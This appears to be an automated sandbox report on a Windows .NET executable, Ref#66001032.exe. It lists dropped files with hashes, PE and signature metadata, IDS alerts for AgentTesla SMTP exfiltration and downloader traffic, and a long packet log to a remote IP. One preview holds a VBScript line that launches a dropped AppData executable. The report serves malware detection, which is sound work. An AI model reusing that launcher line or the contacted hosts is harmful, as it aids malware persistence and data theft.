                                                                                                SHA-512:587F3AC80AC77145CC9727A3029E7DCF9CE9B74482EC6CD4CF320773ECE497ADB043D8DB415A6D459962788953509D1CC1D7B7102570B9276C155D0D02B41161
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1843)
                                                                                                Category:dropped
                                                                                                Size (bytes):1921
                                                                                                Entropy (8bit):5.1748015810288575
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8vhewRadZz5:07vexwKUYp0i4nq+0Bhfo
                                                                                                MD5:594D31388C618729B29DC36C67FA2896
                                                                                                SHA1:A98AD55BFCB59175D672E1562BF045E465FD692D
                                                                                                SHA-256:C25E49283ABF56F17D5E4AC821033B707AE20FC86B97A37B8B5E46CFA28BA0F3
                                                                                                SHA-512:9F822AD38A6EFF66E0067E502818D811D33ED713D945666BEA0E84B89D8F31C618DAC691FEC2AEC22D28A7E03FBAC7877FFFF4AD26031B56D14DFE6709AC5FF6
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1859)
                                                                                                Category:dropped
                                                                                                Size (bytes):1937
                                                                                                Entropy (8bit):5.202979437179745
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8vXewNdZM45:07vexwKUYp0i4nq+0Bhik
                                                                                                MD5:E1DA2FAA42E19F036B8AF4F9FDB86F82
                                                                                                SHA1:928B5F99D714B00F941544851A7ED226E9225051
                                                                                                SHA-256:B112A89E4D3AD33EE8E53F87E084075416F854EBA96789B087C8B04A1697691A
                                                                                                SHA-512:DE9A21338A6A5AE9A2410B980BB7F7D27EEE8ACB254BD92845ED44E428C92F01B5FE2A5AE959470AFC1E6223B17CE6DE170EA69E2CF27EC5CFB9CA3FD501C1A1
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1889), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1889
                                                                                                Entropy (8bit):5.156181774517006
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RdLVNmyWogeFRsol8M4HZQbe4Jun4iDcRBj1:R52e589QT1
                                                                                                MD5:3C9AE8D8AC0E16EC6822A6933FB52285
                                                                                                SHA1:D75F53DEC129379F5B784B722E7053DBF7B855ED
                                                                                                SHA-256:8B73DFFE278B6FBA9EE96ED6AE2F42205D22FFE56CE702BCF9440A0AED703169
                                                                                                SHA-512:29ED37E704CEDDF689D105EBA293E54D728BF578CAE687E28FCBECD09C99C061AA276AE4368F561467CE4522E43F9BBA921E47233F944843A90B5F5C78B61FD4
                                                                                                Malicious:false
                                                                                                Preview:<VersionMap><VersionMapEntry><ObjectId>13FC1E21-492E-4404-B67D-92E57C6DE3DF</ObjectId><Version>0</Version><ObjectLastUpdated>133806202379335143</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>9DECF935-22EC-4458-AC01-CEE0750D4C59</ObjectId><Version>0</Version><ObjectLastUpdated>133806202379491438</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>A81D5357-1D02-46F4-B84E-8B3153787909</ObjectId><Version>0</Version><ObjectLastUpdated>133806202379491438</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>E2081125-158E-4663-86C2-00FA9FF646C6</ObjectId><Version>45</Version><ObjectLastUpdated>133806202425585212</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>1885DBF2-DB3A-4ADF-93E7-48484DEF85CC</ObjectId><Version>29</Version><ObjectLastUpdated>133806202409022627</ObjectLastUpdated></VersionMapEntry><VersionMapEntry><ObjectId>C7D90621-A153-4A7F-85FE-52305A56EF9E</ObjectId><Version>10</Version><ObjectLastUpdated>133806202409022627</ObjectL
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):165
                                                                                                Entropy (8bit):1.610853976637159
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                Malicious:false
                                                                                                Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Process:C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):82040
                                                                                                Entropy (8bit):5.996102822664469
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:Fv5H6LNjnvIQEBJzPYTfRGyRwcVKwYNCul6hGTviJ/mH:jUz2zgTfQEYYuVv2/Y
                                                                                                MD5:74E7FAC7B65EF917CCF9A16A28E52663
                                                                                                SHA1:6B887463D02F2856FA48836E0A1F63744F77226D
                                                                                                SHA-256:960629415A5344E8A50051BBF2808E39C4459074EB0B37D2B8704DE13143A595
                                                                                                SHA-512:F837E789B70E23DB196951F8040431229E21A6893F770E3E77853A87C3927BADF47268675989F3197FEE035EA8B5B9C6913890CC3ADE341A89997577E9B3F8B5
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.{g.....................J........... ........@.. ....................................`.....................................S........H..............x....`....................................................... ............... ..H............text........ ...................... ..`.rsrc....H.......H..................@..@.reloc.......`......................@..B........................H............M..........4...h............................................0..........(....*.*.(....&*.s....%(....(.....o....o....o....*..(....*.s....%(.....o....u.... .t..(....o....o....*.s....%.....(....(.....o....u.... :u..(....(....(...+o....o....*...0.......... &v..(....(..... Dv..(....(.....(....u.....s.....s...........o.....s............io....s....%..o....o......."..,...o.......,...o......,..o.......*....(....J."l........8.@x........1.S........0..S.........+J.s....%o....
                                                                                                Process:C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                Process:C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):84
                                                                                                Entropy (8bit):4.655386241386206
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:FER/n0eFHHoN+EaKC5rf1n:FER/lFHIN7aZ5Z
                                                                                                MD5:FC7312612CB88DB3D97923AD5C12B0A8
                                                                                                SHA1:F556D5B35A2D8F244C42C435036B0A93688C2EF7
                                                                                                SHA-256:AF3626F0BF0876E790B0C7D0685F2B96822F9FB79A092AF75B11D13F0F4212E1
                                                                                                SHA-512:482794D5124B13F9F1B306CE02CA216053C6D588210EBAAACED0A146B7BC9DAA649325A6DA49ED4C80B9DE35C07CCE9402F52BF753738C796F891574096604C6
                                                                                                Malicious:true
                                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Length.exe"""
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):5.996102822664469
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Ref#66001032.exe
                                                                                                File size:82'040 bytes
                                                                                                MD5:74e7fac7b65ef917ccf9a16a28e52663
                                                                                                SHA1:6b887463d02f2856fa48836e0a1f63744f77226d
                                                                                                SHA256:960629415a5344e8a50051bbf2808e39c4459074eb0b37d2b8704de13143a595
                                                                                                SHA512:f837e789b70e23db196951f8040431229e21a6893f770e3e77853a87c3927badf47268675989f3197fee035ea8b5b9c6913890cc3ade341a89997577e9b3f8b5
                                                                                                SSDEEP:1536:Fv5H6LNjnvIQEBJzPYTfRGyRwcVKwYNCul6hGTviJ/mH:jUz2zgTfQEYYuVv2/Y
                                                                                                TLSH:E2830738E74F9252CE998DBBC4D1107D43FCAE935542E62659C4FFA83832FD2C605A1A
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.{g.....................J........... ........@.. ....................................`................................
                                                                                                Icon Hash:23d8d8d4d4d85007
                                                                                                Entrypoint:0x40e40e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x677B1325 [Sun Jan 5 23:17:57 2025 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 19/10/2023 11:33:01 19/10/2024 11:33:01
                                                                                                Subject Chain
                                                                                                • CN=Helpfeel Inc, OU=\u958b\u767a\u90e8, O=Helpfeel Inc, STREET=110-16 Goshohachiman-cho, L="Kyoto-shi, Kamigyo-ku", S=Kyoto, C=JP, OID.1.3.6.1.4.1.311.60.2.1.3=JP, SERIALNUMBER=1300-01-068185, OID.2.5.4.15=Private Organization
                                                                                                Version:3
                                                                                                Thumbprint MD5:0D966BC363CD56690E80EE36566E3C7B
                                                                                                Thumbprint SHA-1:A955D2CBD3F7D394053A3C5219A93AF13917EA0D
                                                                                                Thumbprint SHA-256:2362CABC8423B1EE01F2DE0F40197E509F8FA6DCF631E687EDB44792B241E526
                                                                                                Serial:138A5335DB02BAFDC71DC47A
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe3b8 | 0x53 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10000 | 0x4800 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11200 | 0x2e78 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x16000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xc414 | 0xc600 | 112ec97bdcdad6ad3c3be4ab02811405 | False | 0.5662878787878788 | data | 6.1996066488420185 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x10000 | 0x4800 | 0x4800 | 732d964878f857fa71eb071b9c7f85a2 | False | 0.0774197048611111 | data | 2.216908961392771 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x16000 | 0xc | 0x200 | 2eaa787189204cf0ae0b168bebfe54f5 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x10130 | 0x4028 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | | | 0.039454456892352656 |
| RT_GROUP_ICON | 0x14158 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0x1416c | 0x38c | PGP symmetric key encrypted data - Plaintext or unencrypted data | | | 0.42180616740088106 |
| RT_MANIFEST | 0x144f8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-06T07:54:55.095612+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.6 | 61095 | 162.254.34.31 | 587 | TCP |
| 2025-01-06T07:56:27.254091+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 61089 | 5.253.86.15 | 443 | TCP |
| 2025-01-06T07:56:52.472470+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 61090 | 5.253.86.15 | 443 | TCP |
| 2025-01-06T07:56:55.141364+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 61092 | 5.253.86.15 | 443 | TCP |
| 2025-01-06T07:58:44.855354+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 61113 | 5.253.86.15 | 443 | TCP |
| 2025-01-06T07:59:00.192218+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 61114 | 5.253.86.15 | 443 | TCP |
| 2025-01-06T07:59:04.099842+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 61115 | 5.253.86.15 | 443 | TCP |
| 2025-01-06T07:59:08.089464+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 61116 | 5.253.86.15 | 443 | TCP |

                                                                                                Jan 6, 2025 07:56:12.414139986 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.414259911 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.414313078 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.415404081 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.415467024 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.415719032 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.415775061 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.415781021 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.415848017 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.416038036 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.416075945 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.416100025 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.416105986 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.416121006 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.416122913 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.416155100 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.416160107 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.416172028 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.416642904 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.416677952 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.416692972 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.416699886 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.416753054 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.421834946 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.421912909 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.421919107 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.421983004 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.496581078 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.496690989 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.497253895 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.497294903 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.497308016 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.497333050 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.497342110 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.497354031 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.497610092 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.497692108 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.497699022 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.497709990 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.497745991 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.497769117 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.497769117 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.497775078 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.497792006 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.497817993 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.498176098 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.498212099 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.498222113 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.498235941 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.498264074 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.498264074 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.498522043 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.498563051 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.498575926 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.498580933 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.498614073 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.498699903 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.498999119 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.499034882 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.499053955 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.499061108 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.499077082 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.499118090 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.578808069 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.578906059 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.579077005 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579116106 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579128981 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.579138041 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579149008 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579152107 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.579166889 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.579171896 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579199076 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.579268932 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579307079 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.579310894 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579324007 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579348087 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.579360008 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579395056 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.579401016 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.579430103 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.579972029 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.580012083 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.580040932 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.580046892 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.580081940 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.580255032 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.580290079 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.580301046 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.580307007 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.580324888 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.580342054 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.580434084 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.580463886 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.580504894 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.580512047 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.580539942 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.667282104 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.667371988 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.667469978 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.667519093 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.667532921 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.667537928 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.667550087 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.667562008 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.667581081 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.667584896 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.667594910 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.667627096 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.668109894 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668153048 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668160915 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.668169975 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668194056 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.668200016 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668211937 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.668217897 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668245077 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.668567896 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668605089 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668620110 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.668626070 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668649912 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.668704033 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668751955 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.668761015 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.668792009 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.669121981 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.669153929 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.669176102 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.669181108 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.669198036 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.669209957 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.752998114 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.753062010 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.753093958 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.753113031 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.753130913 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.753149986 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.753164053 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.753171921 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.753202915 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.753207922 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.753238916 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.753248930 CET443497135.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:12.753288984 CET49713443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:12.753504038 CET443497135.253.86.15192.168.2.6
